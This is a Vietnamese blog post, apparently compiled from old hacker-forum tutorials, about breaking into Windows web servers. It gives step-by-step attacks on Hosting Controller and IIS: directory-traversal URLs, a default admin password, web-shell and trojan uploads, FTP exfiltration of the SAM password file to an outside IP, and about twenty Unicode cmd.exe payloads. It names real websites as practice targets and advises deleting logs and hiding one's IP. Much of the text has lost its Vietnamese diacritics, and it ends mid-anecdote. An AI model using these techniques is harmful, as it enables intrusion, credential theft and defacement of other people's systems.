Hack Sever - Đăng Khoa Blog

Hack Sever

Các b ướ c Hack Server ! Các b ướ c c ủ a hacker khi mu ố n đ ộ t nh ậ p vào m ộ t h ệ th ố ng máy ch ủ : FootPrinting : Các m ụ c tiêu c...

Các bước Hack Server ! Các bước ca hacker khi mun đt nhp vào mt h thng máy ch : FootPrinting : Các mc tiêu ca bước này ch yếu là nhng thông tin ban đu v server . Công ngh bn cn s dng là : Open source search ( ngun máy ch tìm kiếm ) Whois , Web interface to whois , Arin Whois , DNS zone transfer ( b phn này ch yếu là kim tra v người ch server , DNS .. cu trúc server chưa th hin rõ đây ) 1 s công c : UseNet , search engines ( công c tìm kiếm ) , Edgar Any Unix client , http://www.networksolutions.com/whois , http://www.arin.net/whois , dig , nslookup Is - d , Sam spade Scanning : Phn ln các server chu bung thông tin quan trng trong bước này , hãy c gng tn dng bước này trit đ đ biết các port trên server , nghe đường d liu . Công ngh bn cn s dng là : Ping Sweep , TCP/UDP port Scan , Os Detection . Các công c : fping , icmpenum Ws_ping ProPack , nmap , SuperScan , fscan nmap , queso , siphon . Enumeration : Đến bước này , các attacker bt đu kim soát server sơ b , xác đnh các account trên server , mc đ bo v ... Công ngh bn cn s dng là : List user accounts , List file share , Identify applications . Các tool ph tr : null sessions , DumpACL , sid2user , OnSite Admin showmount , NAT , Legion banner grabbing vi telnet , netcat , rpcinfo . Gaining access : Aha , đã có đ d liu đ kết hp tt c chúng li . Chúng ta bt đu đến gn mc tiêu . Hãy nm chc cơ hi . 1 account có th b Crack . Công ngh : Password eavesdropping , File Share brute forcing , Password file grab , buffer overflows . Các tool : tcpdump , L0phtcrack readsmb , NAT , legion , tftp , pwdump2 ( NT ) ttdb , bind , IIS , .HTR/ISM.DLL Escalating privilege : Nếu 1 account không may mn nào mt cp đ nào đó b crack bước trên , chúng ta s có cái tn dng đ điu khin Server . Công ngh : Password cracking , BUG ,Exploits . Tools : john , L0phtcrack , Ic_messages , getadmin , sechole . Pilfering : Thông tin ly t bước trên đ đ ta đnh v server và điu khin server . Nếu bước này không thành công , hãy đến bước . Công ngh : Evaluate trusts , Search for cleartext passwords . Tool : rhost , LSA Secrets user data , configuration files , Registry . Covering Tracks : H thng luôn ghi nhn nhng hành đng ca bn . Nếu bây gi mà kết thúc , chc bn b tóm ngay . Đây là bước cc kì quan trng . XÓA LOG . Công ngh : Clear logs , hide tools . Tools : Zap , Event log GUI , rootkits , file streaming . Creating Backdoors : Còn phi hi , bn phi đ li 1 cái cng sau , ln sau có vào thì d hơn ch . Nếu không thành công , quay li bước xem li các quyn ca user bn s dng . Công ngh : Creat rogue user accounts , schedule batch jobs , infect startup files , plant remote control services , install monitoring mechanisms , replace apps with Trojan . Tools : members of wheel , administrators cron, At rc , Startup folder , registry keys , netcat , remote.exe , VNC , BO2K , keystroke loggers, add acct to secadmin mail aliases login , fpnwclnt.dll Denial of Servies : 1 attacker không thành công vi nhng gì anh ta đã làm ... h s tn dng nhng exploits code đ làm cho server ngng hot đng luôn , gi đó là : tn công t chi dch v . Công ngh : SYN flood , ICMP techniques , Identical src/dst SYN requests , Overlapping fragment/offset bugs , Out of bounds TCP options ( OOB ) DDoS . Tools ph tr : synk4 , ping of death , smurf land , latierra , teardrop , bonk , newtear , supernuke.exe , trinoo/TFN/stacheldraht Nhng tool trên , bn có th search các máy tìm kiếm như http://www.google.com Hack Server NT qua bug Hosting Controller : Li HC là li ca phn mm Hosting Controller dùng đ qun lý server cung cp domain và hosting cho khách hàng thường được chy dưới Win2000/NT. Tôi s Hack qua li HC và s ví d vi 1 server chưa fix đó là server cha 38 site mà đã được Hacker Forum Hacked vào tháng trước . + Li HC cho bn thc hin 1 dòng lnh đ đc cng ( C; D; E ) thm chí c A ca server qua 1 site hoc trc tiếp bng ID ca server. Li HC thc cht là b li ca 4 file nm trong phn mm là : statsbrowse.asp ; servubrowse.asp ; browsedisk.asp ; browsewebalizerexe.asp ; sqlbrowse.asp Tôi s viết cu trúc ca lnh Hack vào server nh li 4 file này : .................. Trong đó HC có th là : admin ; advadmin; hostingcontroller Li đu tiên tôi gii thiu vi các bn có tên Multiple security vulnerabilities. Đây là các đon Script cho phép bn duyt bt c file nào trên Server : http://www.victim.com/advwebadmin/stats/st...epath=c:/&Opt=3 http://www.victim.com/advwedadmin/serv_u/s...epath=c:/&Opt=3 http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3 http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3 http://www.victim.com/advwedadmin/SQLServ/...epath=c:/&Opt=3 Trong đó Victim là Server b li HC mà bn mun Hack Tôi s ví d các Hack server qua 1 site nm trong server (hay còn gi là Hack local exploit) VD : site này đã b Hacker Forum hack : http://123hollywood.com/hf.htm thanh Address bn đánh 1 trong các dòng lnh sau : http://123hollywood.com/admin/stats/statsb...=c:\&Opt=3 http://123hollywood.com/admin/serv_u/servu...=c:\&Opt=3 http://123hollywood.com/admin/adminsetting...=c:\&Opt=3 http://123hollywood.com/admin/adminsetting...=c:\&Opt=3 http://123hollywood.com/admin/SQLServ/sqlb...=c:\&Opt=3 Lúc nãy bn s vào được phn "Browser Directories". Đây là toàn b cu trúc ca Website đó. Khi các bn đã vào được bên trong ca C:\ bn thy có thư mc websites (đi vi server đang th nghim này, còn đi vi các server khác thì nó thường nm D:/) . Nếu bn đã thy thì OK . Bn hãy vào trong và thy 1 lot các website. Vi server chúng ta đang Hack trên bn s thy các website được đưa vào các thư mc riêng l theo vn. Chúng ta hãy tìm ti website mà nh nó chúng ta vào dược server này . Bn hãy vào 123web/123kinh/123hollywood.com/www/. Bn thy đó cc kỳ đơn gin đúng không . Sau khi biết được đường dn ca site cn Hack thì bn dùng Script sau : http://www.example.com/advwebadmin/folders...om&OpenPath=C:/ Thay example bng tên ca Server và testing bng tên trang Web mun Hack Ví d : Bn đăng ký Website tên cuonglong ca FPT thì ti FPT s cho bn mt nơi đ trang Web : c:\webspace\resadmin\cuonglong\cuonglong.com\www Mun Hack trang này thì bn đánh Script như trên : http://www.ftp.com/advwebadmin/folders/fil...om&OpenPath=C:/ Vy là bn đã vào được cu trúc thư mc ca Web đó nhưng lúc này bn ch quyn upload 1 file nào đó t cng ca bn lên site đó thôi Sau đó bn upload file ntdaddy.asp Website đó. Và chy file này trên Website đó đ ly nhng file *.mdb và *.SAM v, đây là file cha password, bn ch vic gii mã ra Vy là bn đã Hack được Website đó ri Bây gi tôi s hướng dn các bn cách upload và xoá file trên các site này : Cái này thì cũng cc kỳ đơn gin, bn hãy xem mu sau : http://www.eg.com/hc/folders/filemanager.a...om&OpenPath=C:/ trong đó testing là các đường dn vào website mà bn mun upload ; OK ! Bây gi thì bn có th nghch thoi mái; Bn có th cho toàn b site die trong 1 gi cũng được hi hi .. Còn 1 vài li na ca HC, trong đó có li cho phép bn có kh năng khi to cho mình 1 hosting trong server nh dòng lnh sau : http://victim.com/admin/autosignup/dsp_newwebadmin.asp Cũng như trên, Victim là Server b li HC mà bn mun Hack. Ví d đó là Website http://bigguy.ourweb.net/ http://bigguy.ourweb.net/AdvAdmin/autosign...newwebadmin.asp Mình đã khi to cái này, các bác vô xem : http://www.hackerforum.com/ Li này cho phép cho đăng ký free Domain. Bn hãy đăng ngay 1 Domain cho mình ri vào http://www.victim.com/AdvAmin/ đ Login vi vi Account va đăng ký. Sau khi Login, bn click vào mc Directories trên menu ri vào Domain ca bn. Sau đó, bn hãy upload trang web ca mình lên (nơi upload dưới cùng) và nh là tên trang web đng dài, ri click vào logout ( bên phi trên cùng). Vy là ta đã đi được na chng đường Tiếp theo bn hãy vào : http://www.victim.com/AdvAdmin/import/imp_...in.com\www Bn hãy thay ch "username" bng username lúc đu bn đăng ký Domain và thay ch www.yourdomain.com bng đa ch Domain mà bn đăng ký và enter. Ví d tôi đăng ký 1 Domain tên http://www.cuonglong.com/ vi username là ncviet Website http://bigguy.ourweb.net/ thì tôi s gõ : http://bigguy.ourweb.net/AdvAdmin/import/i...onglong.com/www Đây là phn Import ca Website. Nó s hin ra 4 khung đường dn. Bây gi bn hãy tìm trang web ca mình khung th nht bên dưới và click vào nó ri nhn nút "import". Bây gi nó đã copy trang Web ca bn vào khung th hai bên dưới. Ok, vy là bn đã Hack xong ri đó. ví d bn upload file cl.htm thì đường dn Web ca bn s là : http://bigguy.ourweb.net/AdvAdmin/cl.htm Chú ý : http://www.victim.com/ s được thay bng Website b li hc. Và có th trong quá trình hack, server s bt gi IP ca bn vì vy bn nên ngy trang cho tht khéo . Bn có th tìm rt nhiu server hin vn còn đang b li này bng cách và http://www.google.com/ ri nhp t khoá "Hosting Controller" cho nó Search. Tiếp theo là mt li slash dot dot ca HC cho phép ta thy được đường dn các đĩa và các thư mc ca server và ta có th li dng nó đ add (thêm vào) mt đường dn DSN đ ch ti mt đa ch mi. Đ khai thác li này bn dùng đon code sau : http://www.target.com/admin/dsn/dsnmanager....\..\ Cái th hai là chúng ta có th thay đi hoàn toàn hay add vào thư mc admin và thi hành nhng gì chúng ta mun. Đ khai thác li này ch cn đưa vào đon code sau : http://www.target.com/admin/import/imp_roo...tpPath=C:\ Bn có th nm quyn điu khin toàn b các file trong thư mc (và có th là c C:\) và thay đi tùy thích.. Và li cui cùng là default password, nếu admin không xoá hay thay đi user có tên là AdvWebadmin (user default) thì điu này rt nguy him, bi vì ta có th nm quyn điu khin hoàn toàn server (hay 1 phn) thông qua password default cho user này là "advcomm500349", sau đó thì hack ch là vic d dàng. Tin th mình cũng ch thêm cho các bn cách cài trojan hoc 1 chương trình DoS (Denial of Service) vào server mà ban đã vào được đ phc v cho công vic Hack cho mình sau này. Thường thì khi Hack qua li HC bn rt khó có th cài thng chương trình vào C:/ như li IIS được. Nhưng chúng ta vn có th cài 1 chương trình nh chúng ta setup qua site nm trong server. Bn hãy Upload 1 con trojan vào 1 site mà chúng ta mun (Cách Upload như trên đã nói). Sau đây tôi s cài 1 con reaccserver có chc năng khi cài vào 1 server chúng ta có th điu khin server bng máy tính nhà mình. Tôi upload file reaccserver.exe lên site http://123hollywood.com/ . Bây gi mun cài đt trojan này vào trong server bn hãy đánh dòng sau : http://123hollywood.com/reaccserver.exe Bn t hi làm sao mà nó có th cài vào được server mà không qua thông báo máy ch. Đúng, thường thì các phn mm qun lý Hosting s thông báo máy ch nhưng thường thì người qun lý server s b qua chế đ này khi cài đt HC Khi bn đánh dòng trên nếu thành công thì IE s thông báo "server setup file full". Nếu không thành công nó s báo "Can't not Found". Lúc này bn hãy đánh li : http://123hollywood.com/../../../reaccserver.exe Đm bo s OK Chú ý : khi setup file đó thì PC ca bn cũng s b cài đt chương trình đó. Bn hãy g nó ra . Va ri mình đã cài đt trojan reaccserver ri. Bây gi bn hãy dùng phn còn li ca chương trình là file cp.exe. Chúng ta có th Shutdown hoc Restart server kia. Thường thì server s mt ít nht 3 phút đ khi đng lài . Bây gi mình cũng nói thêm v li 1 s Website các server cài đt HC là thường đ các file upload.asp nm trong các thư mc ca Website. Vì vy mc dù li HC có b fix thì chúng ta cũng Hack như thường . Đây là ví d : http://www.aten2000.com/aspupload_samples_...rmAndScript.asp Bn thy chưa ! Mình có th upload bt c file nào mà mình mun . Bây gi mình th tìm cu trúc thường c1o ca 1 website cài HC nha. Bn hãy vào đây : http://www.aten2000.com/cmd.asp đ xem toàn b server vi các lnh dir C:\ ; dir D:\ ; dir E:\ và đc file bng lnh type C:\..[đườngdn].. ----> Chú ý : lnh này có th đc được bt c file nào . Bn th tìm trong đó mà xem cũng có nhiu lm . À khi các bn vào được server, bn nên cài 1 file ASP đ đc cng cho đ. Đây là cu trúc ca file cmd.asp : ----------------------------------------------------------------------- " method="POST"> ------------------------------------------------------------------------------------- NTDaddy có th download đây: ntdaddy download mt s server, không rõ lý do ta phi dùng kết hp c cmdasp và ntdaddy mi hiu qu. Đ khai thác, có 2 ngun thông tin cc kì quan trng mà ta cn quan tâm trước tiên, đó là database ca HC và file sam._, nơi cha tt c các thông tin v các host trên server. File sam._ tht ra ch là bn backup, có th ko đy đ, thường được lưu winnt\repair. Bn sam đy đ winnt\system32\config, như b lock, rt khó ly. Sau khi ly được sam._, các bn dùng l0pht hoc Lc3 (download http://www.l0pht.com/ hoc rt nhiu trên net) đ crack. Còn database ca các host, thường lưu tr thư mc cài đt HC, vd như c:\program files\advanced communitations\NT web hosting\...., là mt file access. Cách download các file như thế nào!? có vài cách cho bn, nếu bn biết được v trí lưu tr data các host trên server (vd như dng d:\users\www\democoun\www, đa ch này thc cht khi browse trên browser s là http://www.democoun.com/ chng hn - đây ch là vd, các bn phi t tìm hiu folder c th, điu này rt quan trng), bn có th dùng lnh copy, chép thng các file này vào thư mc trên, sau đó download thng xung t browser, như www.democoun.com/sam._ . Cách khác là dùng ftp đ send file mình mun đến 1 đa ch ftp mà mình biết, bng gõ lnh trong cmdasp.asp hay nddaddy.asp (Cách này tôi được Kha cung cp thông tin). Tuy nhiên, ta ko th nhp và chy tng lnh tương tác ftp dùng các trình này được, bn phi to 1 file text có cha danh sách các lnh và yêu cu ftp chy các lnh đó. Cách to 1 filte text, ta s dùng lnh echo, xem vd sau: echo OPEN 111.214.156.105 > c:\dl.txt & vol sau khi nhp vào textbox lnh ca cmdasp và run, lnh này s to mt file c:\dl.txt có cha lnh "open 111.214.156.105". Gn tương t vi các lnh khác, vd lnh sau s thêm 1 dòng vào sau lnh open trong file dl.txt: echo USER anonymous anyname@anon.com >> c:\dl.txt & vol Lưu ý t câu lnh th 2 tr đi, ta phi dùng ">>" thay vì ">". Các bn làm tương t vi các lnh còn li, sao cho các lnh trong dl.txt dùng đ send ftp 1 file ít nht phi có các lnh sau: OPEN 111.214.156.105 USER USER anonymous anyname@anon.com binary send C:\sam._ sam._ BYE Các lnh trên s send file c:\sam._ server bn đang hack đến đa ch anon 111.214.156.105. Như vy, bn đã to xong 1 script đ ftp file cn. Bây gi dùng lnh sau đ thc thi các lnh trong dl.txt. Trước tiên, bn chuyn v thư mc cha dl.txt, dùng lnh cd c:\, và nhp lnh sau vào ô lnh cmdasp: "ftp -n -s:c:\dl.txt" và Run! Nếu thành công, tc là browser ko báo li và ch hin các thông tin kết ni ftp...thì file sam._ đã được gi đến đa ch anon trên. Bn ch vic ftp vào đó đ download v. Sau đó bn dùng chương trình L0phtCrack đ gii mã file SAM đó Lưu ý là các file bn copy và download xong, hãy xóa đ tránh b phát hin. Mun tìm các Website b li Hosting Controller thì bn vào http://www.google.com/ ri gõ : "allinurl:/advadmin" (không có du ngoc kép) nhn nút Google Search Thưa các bn, nhng gì mình phát hin cũng chng phi mi m gì, chng qua là tn dng các li đã biết ca HC thôi. Cũng ging như áp dng lý thuyết vào bài tp thôi! :smg] Sau khi đăng kí 1 account vi đường dn: http://www.victim.com/hc/autosignup/dsp_newwebadmin.asp Thì các bn đã có quyn UPLOAD lên server các trojan và backdoor. Nhưng làm sao active nó được? Bn hãy làm theo các bước sau đây: 1.Tìm đa ch IP ca máy Server host trang web đó. 2.Gõ đường dn ti trojan theo dng sau (tôi ch biết cmdasp.asp và ntddady.asp nên tôi cài nó lên): http://d/?a-ch?-IP-Server/resadmi....asp.asp (http://đa-ch-IP-Server/restadmin/username-bn-đã-đăng-kí/www/cmdasp.asp). Tuỳ theo Server mà tên đường dn này có th hơi khác bit chút ít. Bn có th dùng 1 trong 5 bug cho xem cu trúc thư mc ca Server đ biết rõ ràng chính xác. Tương ng vi đa-ch-IP-Server là thư mc WWWROOT trong Server. Ti đây thì có 2 kh năng xy ra: * Admin Server cho bn quyn to, xoá, copy các file trên máy tính. Thế thì OK ri, bn ly các file password v và crack nó ra. Hoc làm gì tuỳ bn. :smg] * Bn ch có th s dng các lnh bình thường như dir, net user, netstat, ...Nhưng không th xoá và copy các file. Làm sao bây gi :sad] ? Chúng ta hãy qua bước 3. (Nhn Admin hôm ri mình nói t l thành công có th đt 60% cũng là vì lý do đó. Nếu gp Admin nào cn thn, nó chng ghi tt c các cng thì mình bó tay. Lúc đó chc phi nh đến các bn thôi.) 3. :shy] Rt may là bn có th khai thác bng cách khác là điu chnh tp tin Autoexec.bat bng lnh ECHO trên CMDASP.ASP. Bây gi bn hãy tìm các backdoor hoc trojan có th t nó cài đt và n núp trên server WinNT.Nếu bn chưa có có th vào TLSECURITY.NET hoc GOOGLE.COM đ Search. Tiếp theo bn hãy upload nó lên account ca bn. Sau đó tiến hành sa đi ni dung ca tp tin AUTOEXEC.BAT ( trong thư mc C:\ ) bng cách dùng lnh ECHO trong cmdasp.asp đ thêm vào dòng lnh - cũng chính là path(đường dn) đến tp tin thi hành ca Backdoor (hay trojan) mà bn đã upload lên. Xong!! :smoking] Bây gi thì bn đã đt được mc đích đt nhp vào trang web ri đó, ăn mng chiến thng di ch . Thành Công Hay Tht Bi còn li là ph thuc vào kĩ năng và kinh nghim che giu tung tích và hack ca bn . Chúc may mn nhé!! Nếu thiếu sót (mình nghĩ nht đnh là có) thì các bn sa cha dùm mình nhé, cám ơn nhiu!! Chúc vui v!! Bye -------------------- -------------------------------------------------------------------------------- Nếu Hosting Controller chưa patch thì không nên dùng cách này bi t l thành công ca nó rt thp,theo tôi chưa chc đã được 6% ch không phi 60% na.Đây là nhng điu kin buc phi có nếu mun s dng cách trên: -Th nht : phi tìm được real IP ca server:real IP ca server là IP tr vào wwwroot trong đĩa C (mc đnh là như vy).1 server config rt nhiu IP nht là server dùng đ host,như vy vic tìm được real IP là rt khó khăn,ngay c khi đã vào được server đó ri thì vic tìm ra real IP cũng là c 1 vn đ ch không nói là lng vng ngoài server đó. -Th hai : Thư mc web ca resadmin (thư mc cha web được to t quyn ca resadmin mà ta đã li dng li HC đ to account) phi nm trong wwwroot mà real IP tr ti,chng hn thư mc web ca resadmin phi nm ti C:\inetpub\wwwroot\resadmin\viethacker\viethacker.net\www .Trên thc tế thì rt ít trường hp như vy bi các hosting thường hay đ web user directory 1 ch khác hoc 1 đĩa khác đ đm bo an toàn. -Th ba : trong trường hp đã tìm được real IP và thư mc web ca resadmin đã đt trong wwwroot mà real IP tr ti thì còn phi cn điu kin là wwwroot không b hn chế quyn đi vi web user có nghĩa là web user có th truy cp vào các file và subforder ca wwwroot t real IP. -Trong trường hp hn hu đã có đ 3 điu kin trên và đã vào được server nhưng chưa ly được quyn Admin thì cũng khó khai thác bi b nhiu restrict (hn chế t phía server và nhiu trojan ch hiu qu khi được chy dưới quyn Admin,còn đây chúng ta ch vào server vi quyn ca web user.Hãy tìm cách ly được quyn Admin khi đang vào server vi tư cách là 1 web user. File /accounts/updateuserdesc.asp không kim tra li logged in user khi submit, do vây bng vic sa li file này chúng ta có th đi password ca bt kỳ mt user nào Cách làm : Dành cho các bn đã to được webadmin user, còn ai đã to được reseller admin thì s đơn gin hơn (t nghiên cu thêm nhé). Trước tiên bn lưu file sau thành file updateuserdesc.asp trên cng ca bn: updateuserdesc.asp
Top of Form
Update User Account
Alter
User Information

User Name:
killuser
Full Name:
Description :
Change Password Also:
    
New Password  : 
Account Disabled:
    
User Cannot Change password:
Bottom of Form

Chú ý nhớ đổi lại www.yourvictim.com và killuser (username của user mà bạn muốn đổi). Sau đó vào www.yourvictim.com và login vào bằng webadmin account của bạn. Sửa url address thành c:\your dir\updateuserdesc.asp , trang updateuser của hc sẽ hiện lên với username = killuser, bạn chỉ việc check vào "Change Password Also" và nhập password mới vào "New password", rồi Submit ==> DONE Kiểm tra lại bằng cách login vào với user "killuser". Bạn có thể tìm tên các user bằng cách duyệt các thư mục con trong web root của hc, vì tên thư mục chính là tên user. Chú ý là việc sửa password sẽ bị phát hiện ra ngay khi user thật login vào, do đó không nên lạm dụng. IIS Server Chao anh em! Hom nay toi lai tiep tuc gioi thieu voi anh em mot ky thuat hack vao IIS Server nua. Tai lieu nay khong phai cua em, ma em chi di "hoc lom" duoc tren Internet va da thuc hanh roi. Thay hay hay len muon cung anh em trao doi. Buoc 1: Anh em can mot file Unicode duoi dang Perl (*.pl) va mot chuong trinh Perl. Buoc 2: Sau khi da chuan bi xong. Anh em ra DOS go: perl unicode.pl Se thay Host: (go dia chi Website ma anh em muon xac dinh xem co phai la IIS khong) Port: Go 80. ..... Cho mot chut neu la IIS no se tim cac Bug tren IIS. Trong file Unicode.pl co chua khoang 20 Bug. 1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+ [2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+ [3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ [4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+ [5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ [6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+ [7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ [8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ [9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+ [10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+ [11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+ [12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+ [13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+ [14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/ c+ [15] /cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ [16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ [17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/ c+ [18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ [19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ [20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/ c+ Buoc 3: Anh em mo Browser go dia chi trang Web va copy phan bug ma Unicode phat hien vao. VD: Toi go perl unicode.pl Host: http://www.tnh.com.vn Port: 80 Sau khi no Scan thi thay cai Host nay co 2 Bug 14 va 18. Toi co the su dung mot trong 2 bug nay. Chang han toi su dung Bug 18. Toi mo Browser, trong thanh Add toi go: http://www.tnh.com.vn/_vti_bin/..%c0%af..%...m32/cmd.exe?/c+ Vay la ban da dot nhap duoc vao IIS roi day. Cac ban co the truy cap vao o cung cua IIS nhu la o cung cua minh vay. Cac ban co the tao, xoa, di chuyen, thu muc, file, up, down va run cac file tren Server do...Muon vay cac ban chi can dung cac lenh cua DOS thoi. Dung noi voi toi la cac ban khong biet lenh Dos nha. VD: De doc o C----Cac ban go dir+c:\----Tuong ung voi dong lenh o Browser. http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\ Tuong tu co cac lenh nhu: md, rd, ren...Cu ngam lai sach DOS la OK het a. P/S: Thong thuong trang Web thuong o inetpub\wwwroot Anh em chi can dzo day thay File index.html cua no bang index.html cua minh. Vay la OK! Website do bi hack roi day. Nho dung cac chuong trinh de che dau IP cho an toan nha. Khong la boc lich nhu choi day. Duoi day la mot so Website dung IIS http://www.psv.com.vn/ http://www.tnh.com.vn/ http://www.mekonggreen.com.vn http://www.thaiweb.co.th/ http://www.khaitri.com.vn/ Cach xac dinh Bug va cach dot nhap vao o cung cua Server do em da de cap voi anh em o bai viet truoc roi nha. Cu cho la anh em da dot nhap duoc vao o cung cua Site do roi di. De Down file anh em dung lenh type (xem noi dung file cua DOS). Voi cac file *.html, *.txt thi no se View noi dung cho anh em xem, con voi cac file khong View duoc thi no se hien len cua so yeu cau Save to disk (khong phai Server nao cung lam duoc nhu vay dau, con tuy). VD: em muon down mot file o www.tnh.com.vn (em thi chi quen thuc tap bang cai nay thoi a). Em go http://www.tnh.com.vn/_vti_bin/..%c0%af..%...ype+c:\ten file muon Down. Anh em dung len qua lam dung cung nhu tan pha qua dang cac site. P/S: Hack IIS thi duoc roi, nhung di dao tren Iiternet em thay da so cac site thuong dung Apache Server. Em dang tap Hack Apache Server. Em hien dang co mot tai lieu day hack Apache Server, em doc thay kha de hieu....Nhung khi thuc hanh thi mai khong duoc, khong biet la tai Server do Patch roi hay la tai em ngu. Anh nao biet cach hack Apache lam on huong dan anh em voi....Website cua bon FPT cung dung IIS, nhung rat tiec la no da Patch roi. UP FILES TRONG IIS SERVER Em se gioi thieu tiep voi anh em cach Up file len IIS da bi bug. Bai nay khong phai do em viet, em chi di hoc lom thoi, thay hay thi post cho anh em thoi a. Dau tien anh em can tai doan Code (lai ten la Unicode) tu dia chi: http://www.cners.com/tools/unicode.zip Chay file tftpd32.exe ( hoac tftpd.exe toi quen roi ) truong hop ko ro rang anh em cu rename sao cho co du 2 file tftpd.exe va tftpd32.exe vay . Chay file nay ,sau do xem so IP va ghi lai . Dung notepad mo file uniexe.pl ra, sua cho xxx.xxx.xxx.xxx thanh so IP vua co tu tftpd . Sua cac thong so tren cung hang voi cho xxx.xxx.xxx.xxx vua dien : +thay "GET ncx99.exe" thanh "GET yyy.zzz" voi yyy.zzz la mot file nam tren o cung cua anh em +thay phan C:\inetpub\scripts bang duong dan den thu muc anh em muon upload file xem vd sau de ro hon : #You need to change the xxx.xxx.xxx.xxx to your ip address. Duh! $command="tftp -i 202.162.63.126 GET index.htm c:\\inetpub\\wwwroot\\index.htm"; ---> trong VD tren toi da copy 1 file trong thu muc C:\ cua toi ( co IP la 202.162.63.126 ) toi C:\inetpub\wwwroot\ cua may chu bi dinh unicode bug. Sau do anh em ra ngoai DOS, go Perl Ip cua may chu:port VD: perl uniexe.pl 202.162.45.78:80 Neu khong co van de gi thi file do da duoc Up len server roi do. Luu y: Ngoai up cac file *.html, anh em co the update cac trojan remote access hay la cac chuong trinh getadmin cho Winnt de doat quyen admin roi tung hoanh trong may chu nay. De chay file tren Server, ra Dos go: Perl uniexe.pl ip cua trang web:port ten file can run (co ca duong dan). P/S: Khong phai bat cu may chu nao cung cho phep anh em tao, di chuyen, hay run tren no dau. Tuy thuoc vao Admin thoi. Mot so anh em co noi rang khi Scan khong thay phat hien Bug nao, chac la no Patch het tron roi. Anh em can phai di kiem Website khac thoi....Theo em biet thi cac Website cua Thailand hay xai IIS lam. Em dang thuc hanh len cung chang can nhieu Server lam, hien dang thuc hanh tren http://www.tnh.com.vn/ Anh em nao can thi co the dzo luon o cung cua no thuc hanh bang cach copy doan Code sau vao Add trong Browser cua anh em. http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\ Hay vao va tao mot thu muc HKC-LPTV. A quen, de an toan anh em len dung cac Proxy de truy zdo may nay. Sao một thời gian bận rộn...đếm tiền và *chới dzới* (anyway, for those who really want to know what I have done in the last three months, pay a visit to http://www.phpmvc.net , a PHP port of Jakarta Struts), nay mrro mới rãnh rỗi được đôi chút, mà thật ra là do hôm nay ngồi lật lật lại mấy cái folder cũ ghi dấu *một thời tung hoành* hồi trước, bất chợt gặp lại một cái file cũng vui vui nên đem đây kể cho mọi người cùng nghe. Hihi vui là chính thôi nhen. Một phút cho luật chơi: tất cả các thông tin về lỗi bảo mật trong bài viết này đều đã được thông báo cho những bên liên quan và đến thời điểm này thì những lổ hổng đó đã được sửa chữa. (trong bài viết này có một số đoạn hư cấu thêm). Nào chúng ta cùng bắt đầu.... Hồi 1: Ba bốn tường lửa, chuyên nghiệp lắm, dân amatuer làm sao hack nổi! Một ngày tối trời đầu tháng 8 năm ngoái, đang ngồi trong phòng làm việc ở tòa soạn Tuổi Trẻ, bất chợt có người bước vào, àh thì ra là sếp phó tổng biên tập, đi cùng với sếp còn có hai ba người khác nữa, nghe nói là đồng nghiệp bên báo Sài Gòn Giải Phóng sang chơi. "Nè giới thiệu với các anh, hacker của Tuổi Trẻ nè", vừa nói sếp vừa chỉ thẳng vô mình. Trời ơi, ngại muốn chết! Từ trước tới giờ, thằng mrro sợ nhất 2 chuyện (1) ai đó hỏi "eh biết hack Yahoo! Mail hông?" (2) bị người ta kêu là hacker. Thời buổi gì không biết, *hacker* còn quí hơn vàng , mới nghe nhắc tới chữ *hacker*, một ông bên SGGP đã nhảy vào bá vai, nhìn chằm chằm vào mặt thằng mrro (coi coi nó giống người không?! ). "Chắc lại sắp kêu hack cái này cái nọ nữa rồi nè", thằng mrro thầm chửi rủa. Y như rằng: - Hacker hả? Bữa nào thử hack cái www.sggp.org.vn xem, cứ hack thoải mái đi, phá cho hư cũng được, hihi, bên anh cũng đang muốn làm lại cái website đó. Ba nhà báo vừa nói vừa cười nham nhở. -Trời ơi, đừng nghe sếp em nói, em có biết hack hiếc gì đâu. Thằng mrro ấp úng trả lời. -Ừh nói chơi thôi, dân amatuer làm sao hack nổi, cái website của SGGP là do bên VDC làm đấy nhé, chuyên nghiệp cực kì, mấy chú bên đó xây 3-4 cái gì, cái gì, àh nhớ rồi bức tường lửa , bảo mật cực kì, từ trước giờ chưa bao giờ bị tấn công gì hết. Ba nhà báo hí hửng khoe. Có cái gì đó ran rát nóng ở lỗ tai thằng mrro. Vừa dắt xe vô nhà, khóa cửa lại, thằng mrro lập tức chạy lên mở máy tính liền, "mẹ kiếp, để coi ba cái bức tường lửa nó chắc cỡ nào", thằng mrro chửi rủa. "Tò te tò te", tiếng modem giữa đêm khuya nghe như tiếng đàn lục huyền cầm, nghe cũng vui tai ghê. "www.sggp.org.vn[enter]", trước tiên phải xem xem cái website nó ra sao đã. Òh một site tin tức như bao website khác, viết bằng PHP, hihi, tên scriptname cũng là tên tiếng Việt (doctintuc.php thay vì nên là readnews.php), trình bày đơn giản, không chuyên nghiệp lắm có lẽ do đã được làm từ lâu, theo như lời ông nhà báo nói. Hìhì, lại sắp có 